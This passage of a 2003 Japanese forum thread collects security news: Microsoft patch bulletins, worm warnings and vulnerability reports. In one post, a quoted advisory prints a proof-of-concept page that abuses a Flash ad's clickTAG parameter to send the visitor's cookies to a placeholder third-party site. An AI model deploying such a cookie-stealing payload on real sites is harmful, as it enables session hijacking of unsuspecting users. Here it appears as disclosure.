修正プログラムが正しくインストールされたかどうか確認する方法 :
この修正プログラムが正しくインストールされたことを確認するためには、
以下のファイル欄に挙げられているファイルの日付/タイムスタンプを参照し、各ファイルを 確認して下さい。
JScript は Windows Script Engine に含まれる機能の一部で、それ単体で配布されています。
また、スクリプトテクノロジを使用するInternet Explorerのような製品にも同梱されています。
そのため、お客様の環境によって、現在使用されている JScript のバージョンを確認する必要があります。
上記の理由により、Windows Update により修正プログラムをインストールした場合は、JScript 5.5および
JScript 5.1が自動判別され、対応したバージョン の修正プログラムがインストールされます。
その際もセキュリティ対策上問題ございません。
また、お客様の環境にインストールされるファイルは、以下の表の中のひとつとなります。

日付 時刻 バージョン サイズ ファイル名

-----------------------------------------------------------------

2003/01/13 14:57 5.6.0.8513 589,881 Jscript.dll (JScript Version 5.6)

2003/01/13 18:53 5.5.0.8513 553,020 Jscript.dll (JScript Version 5.5)

2003/01/14 14:58 5.1.0.8513 487,481 Jscript.dll (JScript Version 5.1)

270名無しさん@お腹いっぱい。:03/03/22 13:05 ID:???
>>269

面倒だのぉ〜
271名無しさん@お腹いっぱい。:03/03/22 13:19 ID:n9BDskvR
[ロサンゼルス 21日 ロイター] 
イラク戦のさなか、米映画芸術科学アカデミーは21日のアカデミー賞授賞式を予定通り行った。

注目されたアカデミー賞長編アニメ部門では、ライバルの「千と千尋の神隠し」を押しのけて
「リロ&スティッチ」が受賞。
アカデミーは、受賞の理由を、今ほど米国文化に敬意を払うのに大切な時は無いからとしている。

世界各地で広範な反戦デモを引き起こした米国のイラク攻撃の間、映画産業の祭典である授賞式を
どのように挙行するか、ハリウッドはここ1週間追い詰められていた。
http://pc.2ch.net/test/read.cgi/sec/1017309416/l30

272268:03/03/22 13:27 ID:GkpTbx1a
>>269
さんくすです。
確認だけでも大変なんだな。。。
273名無しさん@お腹いっぱい。:03/03/22 13:32 ID:???
>>271
専用ブラウザ普及してるから無駄だべ。
274名無しさん@お腹いっぱい。:03/03/22 16:43 ID:VsDNy8Rg
ZDNN:MSのパッチでシステムがフリーズ
http://www.zdnet.co.jp/news/0303/21/nebt_16.html
275あぼーん:あぼーん
あぼーん
276窓板住人 ◆winDOwS0aE :03/03/23 15:21 ID:???
まぁ、まったり行きましょう・・・

米国を中心としたWebサイトの改ざんについて
http://www.isskk.co.jp/support/techinfo/general/webcrack_analysis.html
米国のサイトを中心に数千件のWebサーバの改ざんが行なわれている模様です。
尚、米国以外のサイトにおいても、改ざん竄が行なわれていることから、日本の
サイトにおいても、十分な対策を行なう事が必要と思われます。
改ざんされたサイトは、Apache/1.3x + OpenSSL/0.96bを利用しているところが
非常に多いことがわかりました。また、Microsoft IIS についても、改ざんが
行なわれております。(抜粋・詳細は上記リンク先を参照してください)
277窓板住人 ◆winDOwS0aE :03/03/23 15:26 ID:Hci0oZgL
[VulnWatch] New attack vectors and a vulnerability dissection of MS03-007
http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0144.html

セキュリティホールmemoの文章をそのまま引用します
http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2003/03.html#20030323_ms03-007-new
#他に代わる文章が思いつかなかった
------
MS03-007 が示した弱点の攻撃手段は WebDAV だけではない、という指摘。
WebDAV を無効にした IIS 5.0 はもちろん、IIS 5.0 が存在しない場合ですら、
この弱点を利用した攻撃が可能だという。
全ての Windows 2000 に patch をインストールすべきだ、というのだ。
278名無しさん@お腹いっぱい。:03/03/23 16:03 ID:???
>>266-267
omoroi
279test:03/03/24 04:08 ID:ev886Amn
とうとう日本でも WEB 改竄被害発生 イラン戦争関連 WEB 改竄

https://www.netsecurity.ne.jp/article/1/9238.html
280窓板住人 ◆winDOwS0aE :03/03/24 15:13 ID:+LR3tKr2
==============================================================================
「iOffice」および「desknet's」にパスワードなしにログイン可能なセキュリティ欠陥
==============================================================================
http://memo.st.ryukoku.ac.jp/archive/200303.month/5672.html
http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2003/03.html#20030324_iOffice
少なくとも、iOfficeV3 R1.3 および desknet's V1.0J R1.5 に弱点。認証機能が極めて
不十分であるため、誰でも任意のユーザになりすまし、iOfficeV3 / desknet's V1.0J の
全機能を利用することが可能となる。
desknet's V2.1J R1.2 で修正されているので、upgrade / 移行する。 iOfficeV3 から
desknet's V2 スタンダード版への移行は、2002年4月1日〜2004年3月末までは無償となっている。
281名無しさん@お腹いっぱい。:03/03/24 17:16 ID:???

(^^)脱MS宣言(^^)

282名無しさん@お腹いっぱい。:03/03/24 18:59 ID:???
www.yomiuri.co.jp/politics/news/20030324ia21.htm
283窓板住人 ◆winDOwS0aE :03/03/24 19:14 ID:+LR3tKr2
McAfee ePolicy Orchestrator 2.5SP1エージェントの脆弱点
http://www.nai.com/japan/pqa/aMcAfeeEpo.asp?ancQno=EP03031901&ancProd=McAfeeEpo
284窓板住人 ◆winDOwS0aE :03/03/25 17:15 ID:w+bAg/o+
もういい加減飽きてきたくらいのMS03-007 (>>222-225 >>233-234)に関する件ですが、

セキュリティホールmemoなどによると、Microsoftは、「これらのバージョンはプロダクト
サポート サービスの修正プログラムのみで配布されたバージョンです。(Windows Update
やマイクロソフトの Web サイトからダウンロード可能な修正プログラムではありません。) 」
と記述しているものの、実際にはMicrosoftのWebサイトからダウンロード可能な時期が
あったのではないかと言う指摘があります。どちらにせよ、SP3ではない場合は、ntoskrnl.exe
のバージョンをチェックした方が良さそうです。
http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2003/03.html#20030325_MS03-007-kernel
285名無しさん@お腹いっぱい。:03/03/25 20:37 ID:???
http://homepage2.nifty.com/winfaq/w2k/w2knews.html#bugs

Windows 2000 のコアコンポーネントに重大なセキュリティホールが発覚。
当初 IIS 搭載システムに限定と発表されたが、すべての Windows 2000 が対象と変更された。
一部のシステムに修正プログラムを適用すると Windows が起動しなくなるため、Microsoft のセキュリティ情報 (MS03-007) を熟読の上、早期に適用を。

だそうな
286名無しさん@お腹いっぱい。:03/03/25 20:40 ID:???
ちなみに、昨日SP3をクリーン再インストールしてWinUpdateにアクセスしたら
ちゃんとこのパッチは当たってたので報告まで。
287窓板住人 ◆winDOwS0aE :03/03/27 00:34 ID:LvnAWJhR
LovGateに亜種、txtファイルにワーム実行を関連付け
http://www.zdnet.co.jp/news/0303/26/njbt_06.html
トレンドマイクロは3月25日、2月に流行したワーム「LovGate」の亜種
「WORM_LOVGATE.G」が見つかったとして警告した。危険度は「低」と
しているが、国内で被害が確認されているため注意を呼び掛けている。
288窓板住人 ◆winDOwS0aE :03/03/27 10:13 ID:LvnAWJhR
この書き込みの後、2、3日留守にしますので宜しくお願いします。
=====================================================
このニュースレターでは、セキュリティ情報をいち早くお知らせするために、
要約情報という形式でご案内いたします。
このセキュリティ情報の詳細につきましては、現在準備中です。
=====================================================
最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms03-010ov.asp

MS03-010 に関する情報
「MS03-010: RPC エンドポイント マッパーの問題により、サービス拒否の
攻撃が実行される (331953)」に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。

概要
====
この問題は、下記製品のリモート プロシージャ コール (RPC: Remote
Procedure Call) のエンドポイント マッパーに問題があり、サービス拒否の
攻撃を受ける可能性があります。その結果、悪意のあるユーザーにお客様の
コンピューター上のサービスを停止させられる可能性があります。

対象となる製品
==============
・Microsoft Windows NT 4.0
・Microsoft Windows 2000
・Microsoft Windows XP
289窓板住人 ◆winDOwS0aE :03/03/27 10:15 ID:LvnAWJhR
修正プログラム
==============
・Microsoft Windows NT 4.0
Windows NT 4.0 および Windows NT 4.0 Terminal Server Edition は、
この脆弱性の影響を受けますが、Windows NT 4.0 のアーキテクチャ上の
制限により、この脆弱性を排除するために必要な変更を行う修正プログラムを
提供することができません。したがって、回避策による対応を
お願いいたします。詳細につきましては、下記「回避策」をご覧ください。

・Microsoft Windows 2000
PC/AT 互換機 (WU)
http://download.microsoft.com/download/4/f/9/4f9c4a7c-06c4-4e5f-8df1-13da4ee1a3b7/Q331953_W2K_SP4_X86_JA.exe
NEC PC-9800シリーズ (WU)
http://download.microsoft.com/download/6/e/5/6e5a2765-3e19-4e28-81ef-a6e08d2cbffd/Q331953_W2K_SP4_nec98_JA.exe
Windows 2000 SP2 または Windows 2000 SP3 の環境にインストールすることが
できます。

・Microsoft Windows XP
32 bit Edition (WU)
http://download.microsoft.com/download/9/e/1/9e117c69-10b1-4a2b-b73b-873cc807dfe9/Q331953_WXP_SP2_x86_JPN.exe
64 bit Edition (WU)
http://download.microsoft.com/download/a/b/d/abd28208-d8d1-4100-8260-0a8081f954ed/Q331953_WXP_SP2_ia64_JPN.exe
Windows XP または Windows XP SP1 の環境にインストールすることができます。

修正プログラムのダウンロード、または、インストール方法については次の
サイトを参照ください。(略)
290窓板住人 ◆winDOwS0aE :03/03/27 10:17 ID:LvnAWJhR
省略した部分は>>288冒頭のURLで確認することが出来ます。
-----
回避策
======
Windows NT 4.0 環境のお客様は本回避策により、このセキュリティ情報で
報告される問題への対応が可能です。
ファイアウォールにてポート 135 をブロックする : ポート 135 は、RPC
エンドポイント マッパー サービスとの RPC 接続を開始するために
使用されます。ポート 135 をファイアウォールでブロックし、
ファイアウォールの背後のシステムにこの脆弱性が悪用される攻撃を
防ぐことができます。

詳細
====
この修正プログラムをインストールすることにより、悪意のある
ユーザーによる以下の攻撃を防ぐことができます。
<重要> RPC が不正なメッセージを適切に処理することができないために
サービス拒否の問題が発生します。
対策が行われていないシステムでは、この脆弱性を悪用した攻撃により、
リモート プロシージャ コールを使用する事ができなくなる被害を受ける
可能性があります。これらの攻撃は、ハッカーまたはクラッカーと呼ばれる
悪意のあるユーザーにより引き起こされる可能性があり、この脆弱性を
悪用されることにより、以下のような実害を受ける事が考えられます。
・RPC サービスが異常終了します。
・RPC サービスに依存するサービスが異常終了します。

日本語による詳細については、ただいま準備中です。
それまでの間、英語情報をご参照ください。
MS03-010: Flaw in RPC Endpoint Mapper Could Allow Denial of Service Attacks (331953)
http://www.microsoft.com/technet/security/bulletin/MS03-010.asp

更新履歴 2003/03/27: この要約情報を公開しました。
291名無しさん@お腹いっぱい。:03/03/28 02:00 ID:???
またか

(−。−;)ふ〜〜〜〜〜

292むむむ ◆MUMUMUkopk :03/03/31 19:41 ID:???
■RealPlayer、RealOne Playerにセキュリティ脆弱性〜アップデートで解決
http://internet.watch.impress.co.jp/www/article/2003/0331/real.htm
293名無しさん@お腹いっぱい。:03/04/01 01:54 ID:???
test
294名無しさん@お腹いっぱい。:03/04/04 19:48 ID:X0RrwTMm
age
295名無しさん@お腹いっぱい。:03/04/06 02:40 ID:???
296むむむ ◆MUMUMUkopk :03/04/07 22:00 ID:???
297むむむ ◆MUMUMUkopk :03/04/07 22:05 ID:???
298名無しさん@お腹いっぱい。:03/04/08 15:53 ID:???
Windows 2003 Server
web版、スタンダード版、エンタープライズ版
ボリュームライセンスのキー流出
ttp://news.com.com/2100-1009-995879.html?tag=fd_lede1_hed
299むむむ ◆MUMUMUkopk :03/04/08 16:14 ID:???
300aaaa:03/04/08 16:23 ID:eePiG+gF
301あぼーん:あぼーん
あぼーん
302むむむ ◆MUMUMUkopk :03/04/10 15:27 ID:???
303むむむ ◆MUMUMUkopk :03/04/10 15:29 ID:???
■Microsoft Proxy Server 2.0とISA Server 2000にDoS攻撃に対する脆弱性(MS03-012)
http://www.microsoft.com/japan/technet/security/bulletin/ms03-012ov.asp
304むむむ ◆MUMUMUkopk :03/04/10 15:29 ID:???
>>302-303
MSのこういうのって、やっぱいままでのように本文を貼り付けたほうがいいのかしら。
305名無しさん@お腹いっぱい。:03/04/10 15:38 ID:g5BWo8uF
火戸
王里
土鬼

口兄
メ几
木又
306名無しさん@お腹いっぱい。:03/04/10 16:56 ID:sWuqzjzD
OSの再インストール今日やるんじゃなかった…。
WindowsUpdate重杉…_| ̄|○
307名無しさん@お腹いっぱい。:03/04/10 22:43 ID:???
>>304
個人的には、貼り付けない方が良いと思う。
308名無しさん@お腹いっぱい。:03/04/10 23:13 ID:/3XPVlp0
ういんどーずあぷでーと しるのはいいが
途中でエラーになるよ(;´Д`)
2000も98もだめだめぽ
漏れだけかな。。。(;´Д`)
309名無しさん@お腹いっぱい。:03/04/10 23:31 ID:qjiqPsKS
平成15年度 自作板PC環境調査 最新結果

Windows XP Family 60 46.9%
Windows 2000 Family 44 34.4%
Windows 9x Family 11 8.6%
Windows NT Family 2 1.6%
その他 11 8.6%
310名無しさん@お腹いっぱい。:03/04/10 23:48 ID:1BPJzaY9
xpで自動更新が途中でコケたっぽくて
yahooや朝日コムなどの一部のHPが見れなくなった…。
311名無しさん@お腹いっぱい。:03/04/11 00:19 ID:pmzv9J9g
ふーん
312名無しさん@お腹いっぱい。:03/04/11 00:55 ID:+vBrUkPl
>>310
プロバイダがnifty?
313名無しさん@お腹いっぱい。:03/04/11 08:19 ID:9KAGenfG
>>310
うちも大きいサイトほとんど見れない。
2ちゃんねるも見れる板と見れない板がある。
インストール前に復元してもダメ(削除できない)し、どーしよー
314名無しさん@お腹おっぱい。:03/04/11 14:32 ID:???
>>313
板違い
315窓板住人 ◆winDOwS0aE :03/04/11 19:48 ID:eNkmN4cE
Avex CCCDにWindowsの基本ファイルを(セキュリティホールのあるかもしれないバージョンに)
書き換えるおそれ(未確認情報)

http://memo.st.ryukoku.ac.jp/archive/200304.month/5722.html
http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2003/04.html#20030411_cccd
316名無しさん@お腹いっぱい。:03/04/11 20:10 ID:???
http://memo.st.ryukoku.ac.jp/archive/200304.month/5722.html

セキュリティ問題以前に、たかがCD聞くために
システムを*勝手に*弄られるのはどうかって感じだね
317名無しさん@お腹いっぱい。:03/04/12 17:08 ID:???
CCCDはプロテクトとデータの間のところにセロテープとめれば無効にできるって本にかいてあったよ。
318名無しさん@お腹いっぱい。:03/04/12 17:19 ID:???
>>317
それプロテクト解除
319Macromedia Flash Ads clickTAG Option:03/04/15 22:08 ID:???
Misuse of Macromedia Flash Ads clickTAG Option May Lead to Privacy Breach
http://www.securiteam.com/securitynews/5XP0B0U9PE.html
http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2003/04-15.vpress.txt
<HTML><HEAD>
<meta http-equiv=Content-Type content="text/html; charset=SHIFT_JIS">
<TITLE>banner</TITLE>
<script language="JavaScript">
<!--
function openWindow() {
win=window.open("http://サイトA/banner_b.swf?clickTag=javascript%
3Awindow.open%28%27http%3A%2F%2Fwww.サイトC/message.html%3F%27+%2B+
document.cookie%2C%27_top%27%29","popup",'statusbar.visible = false,
scrollbars=1,width=400,height=60');
}
//--></script></HEAD>
<BODY bgcolor="#FFFFFF" onLoad="openWindow();">
hoge</BODY></HTML>
http://www.zakzak.co.jp/info/koukoku.html
http://www.macromedia.com/resources/richmedia/tracking/designers_guide/
320山崎渉:03/04/17 08:26 ID:???
(^^)
321名無しさん@お腹いっぱい。:03/04/17 13:16 ID:qdyiaAvl
なんかアップデートされた
322名無しさん@お腹いっぱい。:03/04/17 17:44 ID:???
Windows カーネル メッセージ処理のバッファ オーバーランにより、権限が昇格する.
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms03-013ov.asp

ネット経由では出来んみたいやけど。
323名無しさん@お腹いっぱい。:03/04/21 20:46 ID:???
test
324名無しさん@お腹いっぱい。:03/04/24 10:49 ID:EF0V6toM
IEとOutlook Expressに「緊急」の脆弱性
IEに4つの脆弱性が見つかり、米Microsoftが累積パッチをリリース。
同時にOutlook Expressの累積パッチもリリースされた。最大深刻度は「緊急」

http://www.zdnet.co.jp/news/0304/24/nebt_06.html

IEのパッチ
http://www.microsoft.com/windows/ie/downloads/critical/813489/default.asp

OEのパッチ
http://www.microsoft.com/windows/ie/downloads/critical/330994/default.asp

325金太さん:03/04/24 11:01 ID:???
金太きたよ
326金太さん:03/04/24 11:01 ID:???
 金太きたよ
327金太さん:03/04/24 11:01 ID:???
  金太きたよ
328金太さん:03/04/24 11:01 ID:???
   金太きたよ
329金太さん:03/04/24 11:01 ID:???
    金太きたよ
330金太さん:03/04/24 11:01 ID:???
     金太きたよ
331金太さん:03/04/24 11:01 ID:???
      金太きたよ
332金太さん:03/04/24 11:02 ID:???
        金太きたよ
333金太さん:03/04/24 11:02 ID:???
         金太きたよ
334名無しさん@お腹いっぱい。:03/04/24 15:24 ID:???
金太きたよ
335名無しさん@お腹いっぱい。:03/04/24 17:16 ID:qFHnNicp
http://www1.neweb.ne.jp/wb/prof/
平成15年度 自作板PC環境調査 最新結果(一部抜粋)
Version: r27.45 Release date: April 10,2003 up to 265res.

平均年齢        25.4歳

ネット(2ch含)      78.7%
ゲーム          59.0%

Windows XP Family    46.9%
Windows 2000 Family   34.4%

Athlon     45.3%
Pentium 4     29.7%

平均RAM搭載容量 780MB

平均HDD搭載容量 166GB

nVIDIA 49.2%
ATI 28.9%

DVD-R/RW/マルチ 20.4%
CD-R/RW 75.9%

光ファイバー 8.3%
ADSL/xDSL 64.5%

CRT 74.6%
LCD 25.4%
336名無しさん@お腹いっぱい。:03/04/25 13:25 ID:???
Windows 2000と同じセキュリティ・ホールがWindows NTに見つかる

http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030424/2/
337むむむ ◆MUMUMUkopk :03/04/27 16:36 ID:???
■「shlwapi.dll」が原因で簡単なWebサイトでDoS攻撃を受ける可能性のある脆弱性
〜現在マイクロソフトから修正パッチは提供されていない
http://internet.watch.impress.co.jp/www/article/2003/0425/dll.htm
338むむむ ◆MUMUMUkopk :03/04/28 11:56 ID:???
■SARSに便乗したウイルス「コロネックス」が出現、注意呼びかけ

 トレンドマイクロなどコンピューターウイルス対策ソフト各社は中国などで流行して
いる新型肺炎、重症急性呼吸器症候群(SARS=サーズ)に便乗したウイルス
「コロネックス」を発見したと発表した。
(中略)
 メールの件名や添付ファイル名に「corona(コロナ)」「hongkong(香港)」などの
単語を使い、SARS情報の提供を装う。ファイルを開くと感染、アドレス帳の
全アドレスに自己複製メールを送信する。無駄なデータで構成されたファイルを
勝手に作成して記録領域を占有。マイクロソフトのネット閲覧ソフト「インターネット
エクスプローラー」では、起動直後に世界保健機関(WHO)のホームページが
表示されてしまう。 
(以上、2003年4月28日のNIKKEI NETより一部引用―全文は引用元を参照)

引用元: http://it.nikkei.co.jp/it/news/newsCh.cfm?i=2003042703773j0
339むむむ ◆MUMUMUkopk :03/04/28 14:08 ID:???
■Operaに複数の脆弱性

[Opera 7/6] ダウンロード時の長い拡張子で起こる
ヒープバッファオーバーランによる脆弱性
http://opera.rainyblue.org/modules/cjaycontent/index.php?id=5

[Opera 7] JavaScriptコンソールにおける任意のスクリプト挿入による脆弱性
〜 Yet another story of "Phantom of the Opera" 〜
http://opera.rainyblue.org/modules/cjaycontent/index.php?id=6
340記者風野郎 ◆keO78YJbfs :03/04/29 08:11 ID:???
よくまぁ次々と出るわ出るわ(`_ゝ´)フォォー

Windows XPに修正パッチをあてると、パフォーマンスが低下する不具合
http://internet.watch.impress.co.jp/www/article/2003/0428/xp.htm

パッチ適用後にOutlook Expressなどが正しく動かない不具合の対処法が公開
http://internet.watch.impress.co.jp/www/article/2003/0428/oe.htm
341名無しさん@お腹いっぱい。:03/04/29 08:28 ID:lQG63VNe
>>340
おお!情報Thx 何か最近パフォーマンスが低下
(特に右クリック関連の動作が引っかかる)
してて おかしいと思ってたところでした。
削除したら サクサク動くようになった
いつぞやのアドビアクロバット5の不具合も参ったが
今回も悩んでました。
342名無しさん@お腹いっぱい。:03/04/30 08:22 ID:jqwjWWq3
age
343あぼーん:あぼーん
あぼーん
344名無しさん@お腹いっぱい。:03/05/02 13:26 ID:???
「メール本文を開くだけで感染するウイルスに注意」――IPA
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030501/1/
345むむむ ◆MUMUMUkopk :03/05/03 02:38 ID:???
■Adobe Acrobat 5.0.5に任意のコードを実行できる脆弱性、パッチの適用を
http://internet.watch.impress.co.jp/www/article/2003/0502/adobe.htm

Adobeのアナウンス:
http://www.adobe.com/support/downloads/detail.jsp?ftpID=2121 (英文)
http://www.adobe.com/support/downloads/detail.jsp?ftpID=1438 (英文)
346むむむ ◆MUMUMUkopk :03/05/03 02:54 ID:???
■米セキュリティ研究者、Web申込で郵便物大量送付攻撃の危険性を指摘
http://internet.watch.impress.co.jp/www/article/2003/0502/pattack.htm

ふむ。
347やべーよこれ:03/05/03 13:41 ID:mmc3XiOg
http://slashdot.jp/article.pl?sid=03/05/02/2151212&topic=16&mode=thread
平たくいうと、Becky! を標準のメーラにしてる場合、mailto: をクリックしただけで
コンピュータの中のどんなファイル(当然クリックしたユーザがアクセスできる範囲だが)
でも勝手に送信させることができるんだと。
348むむむ ◆MUMUMUkopk :03/05/03 17:04 ID:???
>>347
mailto: をクリックしなくても、Webページを見ただけでだめな場合もあるのね。
それより、RimArtsの対応のほうがちょっと気になるかも。
349名無しさん@お腹いっぱい。:03/05/03 20:36 ID:???
>>347-348
パッチが当たった修正版がリリースされました。
350むむむ ◆MUMUMUkopk :03/05/07 14:03 ID:eD6o/tTl
数日前にVulnWatchに出ていた。ICQ Liteにはこの脆弱性はない模様。

ICQに深刻な脆弱性
http://www.zdnet.co.jp/news/0305/07/nebt_16.html
351窓板住人 ◆winDOwS0aE :03/05/08 00:38 ID:nRldLhq/
Netscape 7.02以前にcookie漏洩などの脆弱性
http://slashdot.jp/article.pl?sid=03/05/03/082215
GnuPGの鍵検証機能にバグ発覚、バージョン1.2.2リリース
http://slashdot.jp/security/03/05/07/0443218.shtml?topic=28
352あぼーん:あぼーん
あぼーん
353名無しさん@お腹いっぱい。:03/05/08 02:26 ID:???
Microsoft TechNet http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-017.asp
"Flaw in Windows Media Player Skins Downloading could allow Code Execution"

日本語版の説明は後日掲載、とのこと
354名無しさん@お腹いっぱい。:03/05/08 11:52 ID:???

Windows Media Playerのスキン機能にセキュリティホール
http://www.zdnet.co.jp/news/0305/08/ne00_wmp.html

9.0は問題なし。問題があるのは7.1と8.0
355名無しさん@お腹いっぱい。:03/05/08 17:51 ID:???

■Windows Media Playerセキュリティ・ホール関連

http://biztech.nikkeibp.co.jp/wcs/j/comp/245716i
356むむむ ◆MUMUMUkopk :03/05/09 02:32 ID:VBnaEuxs
昨日の段階でVulnWatchメーリングリストに出てたんだけど、時間とれなかった。スマソ。

私が最初に見かけたメール(英語)
http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0059.html

+のスレ:
【IT】.NET Passportにアカウント乗っ取りの大穴、Hotmailが読まれる可能性も
http://news2.2ch.net/test/read.cgi/newsplus/1052414281/

Slashdot Japan
http://slashdot.jp/security/03/05/08/1650228.shtml?topic=57
357名無しさん@お腹いっぱい。:03/05/09 11:41 ID:???
セキュリティーmemoの高木さん、何か嫌なことでもあったのかな。
もしくはカルシウムが足りない。怒りすぎ
358むむむ ◆MUMUMUkopk :03/05/09 11:42 ID:???
>>357
あのぐらいなら、いつもの範囲内かなと。
あの持ち味がなくなると、それはそれで彼らしくないし(素)。
359窓板住人 ◆winDOwS0aE :03/05/12 02:23 ID:???
>>357 ML見てないから分かんないけど、
高木さんって結構琴線に触れると(って違う意味だけど)良くキレるよ。
Java-House MLあたり見たらすごいよ(^^;
360むむむ ◆MUMUMUkopk :03/05/12 10:39 ID:???
>>359
もちろん、そういう意味っす(w。 < いつもの範囲内
# このスレではこの話題はこのぐらいでよろしいかと。
361記者風野郎 ◆keO78YJbfs :03/05/12 16:06 ID:MoN70r3j

http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms03-017.asp

2003/5/12: このセキュリティ情報を更新し、「テストしたバージョン」 の欄に Windows Media Player 6.4 を含めました。
また、Windows Media Player 6.4 がこの脆弱性の影響を受けないことを明確にしました。
362あぼーん:あぼーん
あぼーん
363窓板住人 ◆winDOwS0aE :03/05/13 23:41 ID:???
新ウイルス「Fizzer」感染拡大
http://headlines.yahoo.co.jp/hl?a=20030513-00000025-zdn-sci
364名無しさん@お腹いっぱい。:03/05/13 23:45 ID:???
365むむむ ◆MUMUMUkopk :03/05/14 08:48 ID:???
■IP Messenger for Win ver 2.02 以前に Buffer Overflow の脆弱性
http://www.lac.co.jp/security/intelligence/SNSAdvisory/64.html
366窓板住人 ◆winDOwS0aE :03/05/17 14:56 ID:???
いちおうセキュリティがらみということで

マイクロソフトのWindows Server 2003、課題はやはりセキュリティ
http://japan.cnet.com/news/ent/story/0,2000047623,20054367,00.htm
367名無しさん@お腹いっぱい。:03/05/18 23:59 ID:???

◆IEにセキュリティ・ホール,スクリプトを無効にしても攻撃を受ける

パッチを適用しても、攻撃を受ける可能性!

http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030517/1/
368名無しさん@お腹いっぱい。:03/05/19 04:50 ID:???
>>367
http://slashdot.jp/security/03/05/18/1927234.shtml?topic=41
では再現できたらしい。
frame 開きまくりってのは今までもブラクラとして典型的な方法なので(((;゚Д゚))ガクガクブルブル
IE のあぼーんは避けられないものの、悪意ある外部のプログラムの実行を
回避する方法は一応あるようでつ。
369名無しさん@お腹いっぱい。:03/05/19 17:37 ID:???
回避策が会員にしか見えないってなんだよ!
370名無しさん@お腹いっぱい。:03/05/19 18:36 ID:???
>>369
回避策はセキュリティホールmemoのテスト結果まんま。
http://www.st.ryukoku.ac.jp/~kjm/security/memo/2003/05.html#20030516_ie
371窓板住人 ◆winDOwS0aE :03/05/19 20:11 ID:d5oRleKV
MSサポートを装うウイルスに注意
http://headlines.yahoo.co.jp/hl?a=20030519-00000003-zdn-sci

シマンテックは5月18日、マイクロソフトのユーザーサポート担当を
装ったメールでPCに侵入する「W32.HLLW.Mankx@mm」について警告した。
372窓板住人 ◆winDOwS0aE :03/05/19 20:13 ID:d5oRleKV
Netscape/Mozillaに偽のURL表示が可能な脆弱性
http://slashdot.jp/article.pl?sid=03/05/18/157210&topic=51
373名無しさん@お腹いっぱい。:03/05/20 20:39 ID:???
>>368
6だけでなく5(2000SP3)でも可能。
374名無しさん@お腹いっぱい。:03/05/20 22:26 ID:???
>>373
5.5?
5.01(2000SP3)なら再現しなかったけど。
375名無しさん@お腹いっぱい。:03/05/20 22:46 ID:???
5.01(2KSP3)で再現したよ
ただ、古いPC(160MHz)だと「実行」される以前に
IEがクラッシュする
frame自体はProxomitronで防げるけど
376名無しさん@お腹いっぱい。:03/05/21 04:29 ID:???
おまえら!
kageをダウソできません
377名無しさん@お腹いっぱい。:03/05/21 08:02 ID:???
>>374
5.01SP3+α(パッチ)。タブブラでもダメ。
2000でしか5.01はもうサポートされてないから、
穴が見つかったらとりあえず自分で検証したほうがよさそう。
378名無しさん@お腹いっぱい。:03/05/21 13:26 ID:???
>>374
うちの環境(2ksp3,ie5.01)でも再現しないなぁ。
デュアルで入ってるMEの6.0なら再現したが。

IE以外の何かが不味そうだな。
379名無しさん@お腹いっぱい。:03/05/21 13:48 ID:nHALh5dy
なんか今アップデートしてるxmlの何とかって
380名無しさん@お腹いっぱい。:03/05/21 14:01 ID:RoyLkPW8
dolby ac-3 再生できない?
381名無しさん@お腹いっぱい。:03/05/21 14:04 ID:???
セキュリティ問題の修正プログラム - 2002 年 2 月 13 日 (MSXML 4.0)
382山崎渉:03/05/21 21:20 ID:???
━―━―━―━―━―━―━―━―━[JR山崎駅(^^)]━―━―━―━―━―━―━―━―━―
383名無しさん@お腹いっぱい。:03/05/21 21:26 ID:RoyLkPW8
>>382
まじうざい
384あぼーん:あぼーん
あぼーん
385名無しさん@お腹いっぱい。:03/05/21 21:38 ID:RoyLkPW8
荒らしがいっぱい。
386山崎渉:03/05/21 21:54 ID:???
━―━―━―━―━―━―━―━―━[JR山崎駅(^^)]━―━―━―━―━―━―━―━―━―
387窓板住人 ◆winDOwS0aE :03/05/21 22:25 ID:3nPi2usn
■ Buffer overflows in multiple IMAP clients
(bugtraq, Thu, 15 May 2003 03:49:20 +0900 (info from INTERNET Watch))
http://www.st.ryukoku.ac.jp/~kjm/security/memo/#20030516_imap
複数の IMAP クライアントに欠陥。リテラルサイズやメールボックスサイズが巨大な場合に、
クライアントが crash したり、IMAP サーバから任意のコマンドを実行させたりできてしまう。

2003.05.20 追記:
 Becky! にもこの問題があり、Ver2.06.02 で修正されたそうだ。
388窓板住人 ◆winDOwS0aE :03/05/24 20:24 ID:svbsVg1L
SQL Server 2000 Service Pack 3a、MSDE 2000 Service Pack 3a について
http://www.microsoft.com/japan/sql/downloads/2000/sp3.asp

新しいSP3a では、以前の SP3 から次の点が変更されています。
SQL Server 2000 120 日間限定評価版への SP3a の適用が可能になりました。
Microsoft Data Access Components (MDAC) version 2.71a を含んでいます。
このバージョンは、814572 (英語) と 814410 (英語) に記載されている問題を修正しています。
ネットワークが使用できない場合に、1434 ポートへのリスニングを行いません。
389あぼーん:あぼーん
あぼーん
390名無しさん@お腹いっぱい。:03/05/26 00:13 ID:???
Windowsは穴だらけっ
391あぼーん:あぼーん
あぼーん
392あぼーん:あぼーん
あぼーん
393名無しさん@お腹いっぱい。:03/05/28 18:50 ID:85nCh8A0
Windows XPなどでエクスプローラの項目右クリックすると・・・

http://internet.watch.impress.co.jp/www/article/2003/0527/windows.htm
394名無しさん@お腹いっぱい。:03/05/28 22:02 ID:Qc9vCsAs
XPのアップデートに問題
http://live2.2ch.net/test/read.cgi/news/1054106512/

どのアップデートかわかりません。番号かなにかないのかな・・・
395あぼーん:あぼーん
あぼーん
396名無しさん@お腹いっぱい。:03/05/29 08:43 ID:???
>>394
お前、Windowsupdateを知らないだろ。使ったことはないだろ。
397名無しさん@お腹いっぱい。:03/05/29 13:46 ID:???

